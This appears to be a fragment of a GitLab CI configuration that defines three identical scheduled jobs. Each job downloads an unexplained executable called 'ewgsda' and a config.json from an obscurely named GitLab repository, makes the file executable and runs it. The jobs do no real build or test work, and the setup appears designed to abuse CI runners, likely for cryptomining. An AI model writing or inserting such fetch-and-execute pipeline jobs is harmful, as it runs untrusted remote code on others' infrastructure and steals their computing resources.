    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_hgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_igd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda

l_jgd:on-schedule:
  only:
    - schedules
  allow_failure: true
  interruptible: true
  timeout: 15 minutes
  script:
    - wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/ewgsda && wget https://gitlab.com/kawet-mudal/takbukak/ejntuke/heluk/-/raw/master/config.json && chmod u+x ewgsda && ./ewgsda
